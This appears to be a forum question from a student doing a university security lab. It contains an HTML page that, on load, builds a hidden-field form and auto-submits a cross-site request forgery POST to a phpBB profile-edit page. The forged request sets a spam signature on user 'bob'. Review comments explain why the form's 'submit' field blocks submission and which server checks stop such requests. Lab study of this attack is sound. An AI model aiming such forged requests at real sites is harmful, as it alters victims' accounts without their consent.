以下代码构造一个 POST 请求,其请求体必须以 &submit="Submit" 结尾。
不幸的是,名为 submit 的表单字段会与 DOM 表单对象的 submit() 方法产生冲突。
我无权访问该 Web 应用程序,因为这是大学安全作业的一部分。我已经能够通过代理手动编辑数据,把该元素添加到 POST 正文中并成功提交,但我希望能够通过代码自动完成这一切。
任何帮助将非常感激。
<html>
<body>
<h1>
This page sends an HTTP POST request on load. </h1>
<script>
/**
 * Builds a <form> from the supplied markup, attaches it to the current page
 * and submits it as a POST.
 *
 * @param {string} url    Assigned to the form's action (the request target).
 * @param {string} fields HTML markup assigned to the form's innerHTML; it is
 *                        expected to hold the <input> elements to send.
 *
 * The submission is a same-window (target '_self') form POST made from
 * whatever page hosts this script.
 * NOTE(review): whether the receiving site treats such a request as
 * authenticated depends on things not visible here: the SameSite attribute
 * of its session cookie, and whether it requires a per-session anti-CSRF
 * token or checks the Origin/Referer header. Confirm against the server.
 */
function post(url,fields) {
//create a <form> element.
var p = document.createElement('form');
//construct the form
p.action = url;
// fields is parsed as HTML. Every named control it contains is also exposed
// as a property of the form object under that name (p.<name>), and that
// named property takes precedence over the form's built-in members.
p.innerHTML = fields;
p.target = '_self';
p.method = 'post';
//append the form to this page
document.body.appendChild(p);
//submit the form
// If fields contains a control named "submit", p.submit evaluates to that
// <input> element rather than the built-in method, so this call throws a
// TypeError and no request is sent.
p.submit();
}
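/**
 * Assembles the hidden <input> markup for a profile-edit POST and passes it,
 * together with the target URL, to post().
 *
 * Takes no arguments and returns nothing. Every value sent, including sid,
 * user_id and current_email, is a fixed string written into this function.
 *
 * NOTE(review): apart from the hard-coded sid, the body holds no value that
 * is unpredictable to a third-party page. Whether the server ties sid to the
 * requester's session cannot be seen from this listing; a per-session
 * anti-CSRF token validated server-side is the usual control for this kind
 * of state-changing form.
 */
function csrf_hack() {
// Start from an empty string. Left uninitialised, the first += would
// concatenate onto undefined and put the literal text "undefined" in front
// of the markup, which then ends up as a stray text node inside the form.
var fields = "";
// You should replace/augment the following lines with
// your form parameters
fields += "<input type='hidden' name='username' value='bob'>";
fields += "<input type='hidden' name='email' value='bob@seed.com'>";
fields += "<input type='hidden' name='cur_password' value=''>";
fields += "<input type='hidden' name='new_password' value=''>";
fields += "<input type='hidden' name='password_confirm' value=''>";
fields += "<input type='hidden' name='icq' value=''>";
fields += "<input type='hidden' name='aim' value=''>";
fields += "<input type='hidden' name='msn' value='456'>";
fields += "<input type='hidden' name='yim' value=''>";
fields += "<input type='hidden' name='website' value=''>";
fields += "<input type='hidden' name='location' value=''>";
fields += "<input type='hidden' name='occupation' value=''>";
fields += "<input type='hidden' name='interests' value='Hacking'>";
fields += "<input type='hidden' name='signature' value='Free spicy sauce @ www.getyourfreespicysauce.com'>";
fields += "<input type='hidden' name='viewemail' value='0'>";
fields += "<input type='hidden' name='hideonline' value='0'>";
fields += "<input type='hidden' name='notifyreply' value='0'>";
fields += "<input type='hidden' name='notifypm' value='1'>";
fields += "<input type='hidden' name='popup_pm' value='1'>";
fields += "<input type='hidden' name='attachsig' value='1'>";
fields += "<input type='hidden' name='allowbbcode' value='1'>";
fields += "<input type='hidden' name='allowhtml' value='0'>";
fields += "<input type='hidden' name='allowsmilies' value='1'>";
fields += "<input type='hidden' name='language' value='english'>";
fields += "<input type='hidden' name='style' value='1'>";
fields += "<input type='hidden' name='timezone' value='0'>";
fields += "<input type='hidden' name='dateformat' value='D M d, Y g:ia'>";
fields += "<input type='hidden' name='mode' value='editprofile'>";
fields += "<input type='hidden' name='agreed' value='true'>";
fields += "<input type='hidden' name='coppa' value='0'>";
fields += "<input type='hidden' name='sid' value='341942b39d0e2af257286aabd65b1e31'>";
fields += "<input type='hidden' name='user_id' value='4'>";
fields += "<input type='hidden' name='current_email' value='bob@seed.com'>";
// A control named "submit" is exposed on the form object as its `submit`
// property and hides the built-in submit() method. With this line present,
// the p.submit() call inside post() resolves to this <input> element and
// throws a TypeError instead of sending the form.
fields += "<input type='hidden' name='submit' value='Submit'>";
post('http://www.originalphpbb.com/profile.php',fields);
}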
// Once the page has finished loading, build and send the request.
// csrf_hack is looked up when the load event fires, not at assignment time.
window.onload = function () {
  csrf_hack();
};
</script>
</body></html>